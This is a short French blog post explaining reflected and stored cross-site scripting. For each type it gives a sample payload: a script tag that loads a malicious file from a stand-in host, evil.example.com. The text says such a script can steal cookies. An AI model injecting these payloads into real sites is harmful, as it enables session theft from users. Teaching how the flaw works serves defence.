Terminologie

Exemples de Cross-Site scripting

Blog Terminologie Exemples de Cross-Site scripting

Maintenant que vous savez ce qu’est une attaque XSS, voyons quelques exemples de Cross-Site scripting.

Reflected XSS

Disons qu’un attaquant rencontre une URL avec un paramètre contenant un message comme celui-ci:

http://example.com/?message=Vous+êtes+connecté

Et que la page contient exactement ce même message.

Cela signifie que tout ce qui est passé dans ce paramètre appelé message sera imprimé dans la page.

Pour exploiter, l’attaquant doit simplement remplacer le message par un script malicieux :

http://example.com/?message=<script src="http://evil.example.com/script-malicieux.js"></script>

Maintenant, il envoie la page à un administrateur, le script pourra alors dérober les données de l’utilisateur comme ses cookies et les envoyer sur la boite mail de l’attaquant.

Stored XSS

Comme la première, mais cette fois le contenu est gardé dans la base de données du site ciblé et vulnérable.

Disons qu’un attaquant vient d’envoyer un commentaire en utilisant des balises HTML et que ces balises sont évaluées. Cela peut mener à une attaque XSS.

Pour l’exploiter, l’attaquant va juste ajouter son script malicieux dans le message :

<script src="http://evil.example.com/script-malicieux.js"></script>

Si le site est vulnérable, cela signifie qu’il y a un manque de désinfection.